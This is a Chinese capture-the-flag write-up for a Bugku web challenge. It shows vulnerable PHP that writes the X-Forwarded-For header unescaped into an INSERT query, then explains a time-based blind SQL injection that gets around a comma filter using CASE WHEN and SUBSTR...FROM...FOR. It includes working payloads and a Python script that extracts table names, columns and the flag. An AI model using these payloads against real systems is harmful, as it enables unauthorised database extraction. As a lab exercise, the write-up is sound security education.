0x01:
打开题目描述,已经将源码给了我们:
<?phperror_reporting(0);function getIp(){$ip = ‘‘;if(isset($_SERVER[‘HTTP_X_FORWARDED_FOR‘])){$ip = $_SERVER[‘HTTP_X_FORWARDED_FOR‘];}else{$ip = $_SERVER[‘REMOTE_ADDR‘];}$ip_arr = explode(‘,‘, $ip);return $ip_arr[0];}$host="localhost";$user="";$pass="";$db="";$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");mysql_select_db($db) or die("Unable to select database");$ip = getIp();echo ‘your ip is :‘.$ip;$sql="insert into client_ip (ip) values (‘$ip‘)";mysql_query($sql);明确注入点,是走的http报头的x-forwarded-for。
我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
0x02:
我之前时间延迟盲注都是用 if(exp1,exp2,epx3) 这种格式来完成的,但是这里的一段代码,相当于把 "," 给过滤了
$ip_arr = explode(‘,‘, $ip); return $ip_arr[0];
于是改变方法,用 case when exp1 then sleep(4) else 1 end 来绕过 ","的限制
exp1 中要用到substr来进行剪切,这个函数substr(str,1,1) 又是存在 "," , 于是这里我又用 substr (str) from 1 for 1 来绕过 ","的限制
又拼接的语句为value(‘ 输入的内容 ‘),最后的poc为:
1‘ and (case when (length((select database())) = 14) then sleep(4) else 1 end) # 1‘ and (case when (substr(select database()) ?from 1 for 1)=‘c‘ then sleep(4) else 1 end) #
构成的完整语句为
insert into client_ip (ip) values (‘ ?1‘ and (case when (length((select database())) = 14) then sleep(4) else 1 end) # ?‘)
0x03:
最后附上python脚本:
#-*- encoding: utf-8 -*-#字符长度直接手工测的import requestsurl="http://120.24.86.145:8002/web15/"flag=""#data = 11‘ ?and (case when (length((select group_concat(table_name) from information_schema.tables where table_name=database()))=14) then sleep(4) else 1 end)) ##爆表名 长度为14#data = "11‘and (case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=database() ) from " + str(i) + " for 1 )=‘" + str1 + "‘) then sleep(4) else 1 end )) #"#client_ip,flag#data = 11‘ ?and (case when (length((select group_concat(column_name) from information_schema.columns where table_name=‘flag‘))=4) then sleep(4) else 1 end)) ##爆字段 长度为4#data = "11‘ and (case when (substr((select group_concat(column_name) from information_schema.columns where table_name=‘flag‘) from " + str(i) + " for 1 )=‘" + str1 + "‘) then sleep(4) else 1 end )) #"#flag#data = 11‘ ?and (case when (length((select group_concat(flag) from flag))=32) then sleep(4) else 1 end)) ##爆内容 长度为32#data = "11‘ and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )=‘" + str1 + "‘) then sleep(4) else 1 end )) #"for i in range(1,33): ???for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.": ???????data = "11‘ and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )=‘" + str1 + "‘) then sleep(4) else 1 end )) #" ???????# print data ???????headers = {"x-forwarded-for":data} ???????try: ???????????result = requests.get(url,headers=headers,timeout=3) ???????except requests.exceptions.ReadTimeout, e: ???????????flag += str1 ???????????print flag ???????????breakprint ‘flag:‘ + flag不同阶段把上面注释掉的data的赋值代码贴入下面即可,爆长度可以直接在BurpSuite里面发包手测
ps:在注表名的时候 ","因为是被过滤了的,所以脚本跑出来两个表之间的“,”是被过滤了,但是看单词也能把它区分开。
bugku web题INSERT INTO注入
原文地址:https://www.cnblogs.com/sijidou/p/9657026.html